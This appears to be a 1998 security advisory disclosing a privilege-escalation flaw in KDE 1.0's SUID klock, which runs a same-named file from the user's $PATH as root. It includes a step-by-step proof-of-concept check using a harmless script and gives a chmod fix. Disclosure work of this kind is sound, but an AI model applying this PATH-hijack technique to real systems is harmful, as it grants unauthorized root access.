KDE 1.0's klock can be used to gain root priveledges

[hdmoore () USA NET (HD Moore)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --( the problem )--

The SUID program klock shipped with KDE 1.0 attempts to execute
kblankscrn.kss in the same directory as it.  If kblankscrn.kss cannot
be executed (missing or mode -x) then klock will search the current
user's $PATH for any executable with the same name and execute it as
ROOT.  If no executable is found in the current path it gives this
message:

    >Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin

Default modes for klock and kblankscrn.kss are:

- -rwsr-xr-x   1 root     root         8760 Mar 12  1998 /opt/kde/bin/klock
- -rwsr-xr-x   1 root     root        43600 Mar 12  1998
/opt/kde/bin/kblankscrn.kss

Systems Affected:   any system that runs KDE 1.0
____________________________________________________


( the exploit )

This is only exploitable if any of the following occurs:

    1) klock is moved to another directory
    2) kblankscrn.kss is moved to another directory
    3) kblankscrn.kss is not executable

To see if you are vulnerable...

1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
2) login as a normal user
3) create a shell script thats looks like:

        #!/bin/sh
        echo Running script as `whoami`!
        exit

4) name this script to kblankscrn.kss and mv to your home directory.
5) execute /opt/kde/bin/klock, you should see:

    user@hostname:/home/user> /opt/kde/bin/klock
    user@hostname:/home/user> Running script as root!

6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
____________________________________________________


- --( the fix )--

chmod 700 /opt/kde/bin/klock or wait until KDE is updated.
the KDE buglist has been notified




-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
UmLBRO0nACQcXreodKkWFrpm
=rKnX
-----END PGP SIGNATURE-----